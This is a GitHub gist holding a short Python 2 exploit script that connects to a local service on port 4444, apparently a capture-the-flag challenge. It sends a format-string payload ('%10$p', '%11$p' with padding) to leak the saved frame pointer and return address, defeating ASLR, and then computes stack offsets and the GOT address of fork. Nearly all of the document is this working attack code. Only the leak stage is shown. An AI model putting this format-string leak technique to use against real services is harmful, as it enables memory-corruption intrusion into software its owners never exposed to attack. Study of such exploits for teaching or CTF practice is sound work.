/gist:5305853
Last active Dec 15, 2015
| import netcatlib | |
| # Step 0 --- Connect to the target | |
| nc = netcatlib.Netcat("localhost", 4444) | |
| print "[+] Connected" | |
| # Step 1a --- Defeating ASLR with information leakage: location of stack | |
| INFOLEAK = "%10$p:ENDEBP:%11$p:ENDRET:" | |
| nc.read_until("Your choice: ") | |
| nc.write("1" + "\n") | |
| nc.read_until("Insert name: ") | |
| nc.write(INFOLEAK+"A"*(100-len(INFOLEAK))+"\x01\x01"*4+"\xFF\xFF"+"\n") | |
| nc.read_until("Uranium in nuclear plant \"") | |
| ebp = int(nc.read_until(":ENDEBP:")[:-8], 16) | |
| print "[+] Saved frame pointer :", hex(ebp) | |
| location_ebp = ebp - 0x440 | |
| location_ebp_printf = location_ebp - 0x30 | |
| location_payload = ebp + 0x20 + 10*112 | |
| print " > Location saved fp :", hex(location_ebp) | |
| print " > Location fp in printf :", hex(location_ebp_printf) | |
| print " > Location of 1st payload :", hex(location_payload) | |
| # Step 1b --- Defeating ASLR with information leakage: location of stack | |
| ret = int(nc.read_until(":ENDRET:")[:-8], 16) | |
| print "[+] Return address :", hex(ret) | |
| location_got_fork = ret + 0x2E8E | |
| print " > Location of fork in GOT :", hex(location_got_fork) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment